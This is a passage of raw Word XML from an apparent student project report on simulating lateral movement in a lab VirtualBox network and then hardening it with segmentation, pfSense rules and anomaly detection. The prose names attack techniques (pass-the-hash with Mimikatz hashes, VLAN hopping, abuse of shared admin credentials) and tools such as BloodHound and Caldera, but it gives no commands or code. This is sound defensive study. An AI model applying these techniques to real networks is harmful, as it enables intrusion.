      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since pass-the-hash does not require Metasploit (and we don’t believe it’ll be needed to map in topology), it can be executed manually or via scripts using hashes from Mimikatz. Other lateral movement techniques seen in our research </w:t>
      </w:r>
      <w:r w:rsidR="00386AAC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> leveraging open shares, overly permissive firewall rules, VLAN hopping, or taking advantage of shared local admin credentials. All </w:t>
      </w:r>
      <w:r w:rsidR="00386AAC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> orchestrated by the Kali VM, but the actual execution will occur on the compromised Windows 10 machine (as it’s a victim and now an internal threat) to maintain a realistic attack flow – also since the Kali is attempting to remain undetected. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542CA1CA" w14:textId="610AF112" w:rsidR="002E77E8" w:rsidRPr="00FF6966" w:rsidRDefault="002E77E8" w:rsidP="002E77E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We plan to conduct data collection by doing network traffic monitoring with Wireshark to capture interactions between subnets, and logs generated by the tools we used (BloodHound) and Caldera is another cool tool to track the sequence of actions highlighting vulnerabilities. If feasible, event logs from the compromised Windows machine and other critical systems will also be collected for analysis. All those data sources allow </w:t>
      </w:r>
      <w:r w:rsidR="00B4509C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to evaluate attack paths and see if the vulnerabilities I have mentioned are indeed what ends up getting exploited – also identify gaps in the base network’s detection. </w:t>
      </w:r>
      <w:r w:rsidR="00B4509C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However</w:t>
      </w:r>
      <w:r w:rsidR="00AC4D2B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the networking solution(s) we’ll need is comprehensive and probably not a single pinpoint. Another idea is the combination of Caldera and Pathfinder, which are open-source tools developed by MITRE built to simulate adversarial behavior based on MITRE ATT&amp;CK framework (catalog of techniques/tactics/procedures observed in real-world) – this would be more of an automated approach to carrying out the lateral movement simulation showing multiple ways an attacker would do so and how they manage to blend in or conceal their activity (RDP/SMB, LoTL…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47B639" w14:textId="024AF2A0" w:rsidR="002E77E8" w:rsidRPr="00FF6966" w:rsidRDefault="002E77E8" w:rsidP="002E77E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In general, carrying out these methods ourselves with tools will provide critical insight </w:t>
      </w:r>
      <w:r w:rsidR="00B4509C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> how lateral movement occurs within a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D267B82" w14:textId="4140A99B" w:rsidR="002E77E8" w:rsidRPr="00FF6966" w:rsidRDefault="002E77E8" w:rsidP="002E77E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Depending on </w:t>
      </w:r>
      <w:r w:rsidR="00B4509C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidR="00B4509C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> will point </w:t>
      </w:r>
      <w:r w:rsidR="00A91127" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> what solution(s) are needed. </w:t>
      </w:r>
      <w:r w:rsidR="00B4509C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we hypothesize that the topology will need reinforced network segmentation with stronger network defense in depth strategies in general along with going to the domain controller VM to strengthen active directory configurations. PfSense or the chokepoint will be a major focus as it’s where the level of trust is supposed to change preventing potential untrusted access from getting to the fileserver in the first place. Beyond those best practice aspects is detection and response with anomaly-based machine learning (ML).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC06D72" w14:textId="185CD2B1" w:rsidR="008604B2" w:rsidRPr="00FF6966" w:rsidRDefault="002E77E8" w:rsidP="002E77E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">And hopefully, we have time to implement and test those solutions by doing lateral movement again until it can no longer move or remain persistent. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED56204" w14:textId="77777777" w:rsidR="00EB1520" w:rsidRPr="00FF6966" w:rsidRDefault="00EB1520" w:rsidP="00EB1520">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overall, our methodology will focus on iterative testing, starting with deploying a baseline VM network configured with intentional vulnerabilities to replicate real-world vulnerabilities. We will then simulate lateral movement to replicate real-world vulnerabilities. We will then simulate lateral movement to observe how attackers exploit these gaps to pivot from compromised endpoints and access critical assets. Using the data collected, we will implement advanced detection and prevention techniques, including enhanced segmentation, and stricter access controls to mislead and entrap attackers. Testing the improved network will assess its effectiveness in restricting lateral movement and detecting malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75446D9B" w14:textId="6FDAF565" w:rsidR="009303D9" w:rsidRDefault="00EB1520" w:rsidP="00E7596C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>In subsequent phases, we plan to integrate anomaly-based machine learning models and explore automated attack simulation tools like Caldera and Pathfinder to refine our detection capabilities further. By iterating our findings and continuously improving our strategies, we aim to create a resilient network that effectively addresses the threat of lateral movement. While this milestone sets the stage for the project, further research and testing will be essential to enhance the scalability and efficiency of the proposed solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389BF948" w14:textId="77777777" w:rsidR="00AC214F" w:rsidRPr="00FF6966" w:rsidRDefault="00AC214F" w:rsidP="00E7596C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2DD83B" w14:textId="2D4CC742" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="006C3DB3" w:rsidP="006B6B66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Implementation, </w:t>
      </w:r>
      <w:r w:rsidR="00D03801" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D03801" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Discussion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212D557" w14:textId="4B1AC33D" w:rsidR="002F1914" w:rsidRDefault="00FE0B2E" w:rsidP="002F1914">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following section</w:t>
      </w:r>
      <w:r w:rsidR="00C92F15" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B27DAC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">covers </w:t>
      </w:r>
      <w:r w:rsidR="008A481C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>our process of</w:t>
      </w:r>
      <w:r w:rsidR="00EB1E09" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting up the testing environment, what we managed to implement</w:t>
      </w:r>
      <w:r w:rsidR="00BD2FC8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and test, </w:t>
      </w:r>
      <w:r w:rsidR="00C25473">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BD2FC8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>results, and discussio</w:t>
      </w:r>
      <w:r w:rsidR="003E019C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="007837FB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on its outcome – essentially the simulation based on our</w:t>
      </w:r>
      <w:r w:rsidR="004B72A8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> current</w:t>
      </w:r>
      <w:r w:rsidR="007837FB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> methodology</w:t>
      </w:r>
      <w:r w:rsidR="00D07647" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Milestone 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CDDA3B" w14:textId="77777777" w:rsidR="00AC214F" w:rsidRPr="002F1914" w:rsidRDefault="00AC214F" w:rsidP="002F1914">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D29A57E" w14:textId="26A191C4" w:rsidR="002F1914" w:rsidRPr="002F1914" w:rsidRDefault="002F1914" w:rsidP="002F1914">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk184913433"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Deployment of Base Network </w:t>
      </w:r>
      <w:r w:rsidR="00E7592E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initial Compromise</w:t>
      </w:r>
      <w:r w:rsidR="00876835">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phase</w:t>
      </w:r>
      <w:r w:rsidR="00E7592E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788F4AF" w14:textId="21311BCD" w:rsidR="00C84537" w:rsidRPr="00FF6966" w:rsidRDefault="002F1914" w:rsidP="00C84537">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AF0EE6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Our first step was </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00AF0EE6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00DD5A88" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>install and configure the ne</w:t>
      </w:r>
      <w:r w:rsidR="00FB4531">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cessary</w:t>
      </w:r>
      <w:r w:rsidR="00DD5A88" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtual machines </w:t>
      </w:r>
      <w:r w:rsidR="00846E48" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on VirtualBox software run on our laptops</w:t>
      </w:r>
      <w:r w:rsidR="002B5CEF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizing the </w:t>
      </w:r>
      <w:r w:rsidR="00EF5F55" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base topology diagram (Figures 1 and 2)</w:t>
      </w:r>
      <w:r w:rsidR="00E62441" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E48E4D4" w14:textId="740446A2" w:rsidR="0007298E" w:rsidRDefault="005454D5" w:rsidP="0007298E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="485B8E06" wp14:editId="6316B9C6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1024731</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="879731" cy="881781"/>
                <wp:effectExtent l="0" t="0" r="15875" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="1433344439" name="Rectangle 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="879731" cy="881781"/>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00E1D" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:80.7pt;width:69.25pt;height:69.45p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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00695955">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49FAD629" wp14:editId="3ADFBE59">
            <wp:extent cx="3089910" cy="1915795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="32723648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36483" name="Picture 3"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9910" cy="1915795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F8729" w14:textId="7606D379" w:rsidR="0007298E" w:rsidRPr="00E66527" w:rsidRDefault="0007298E" w:rsidP="0007298E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E66527">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E66527">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66527">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r w:rsidR="002C78BB" w:rsidRPr="00E66527">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Virtual Machines</w:t>
      </w:r>
      <w:r w:rsidR="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> within VirtualBox’s GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3757C4B4" w14:textId="2F918FDD" w:rsidR="0078338F" w:rsidRDefault="00E62441" w:rsidP="00F47E94">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As described earlier, </w:t>
      </w:r>
      <w:r w:rsidR="006F3E42" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">our setup </w:t>
      </w:r>
      <w:r w:rsidR="00682A4E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is comprised of, </w:t>
      </w:r>
      <w:r w:rsidR="00C25473">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in total,</w:t>
      </w:r>
      <w:r w:rsidR="006F3E42" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> five</w:t>
      </w:r>
      <w:r w:rsidR="000B4488" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> machines</w:t>
      </w:r>
      <w:r w:rsidR="00F86E7D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD2E0E" w14:textId="1A0BC7B9" w:rsidR="009541E7" w:rsidRPr="00FF6966" w:rsidRDefault="00682A4E" w:rsidP="009541E7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key Points</w:t>
      </w:r>
      <w:r w:rsidR="009541E7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694ABDB" w14:textId="67654901" w:rsidR="00F86E7D" w:rsidRPr="00FF6966" w:rsidRDefault="005B75D2" w:rsidP="009541E7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PfSense</w:t>
      </w:r>
      <w:r w:rsidR="009541E7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.7.0</w:t>
      </w:r>
      <w:r w:rsidR="005D3D99" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9426B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CE </w:t>
      </w:r>
      <w:r w:rsidR="005D3D99" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
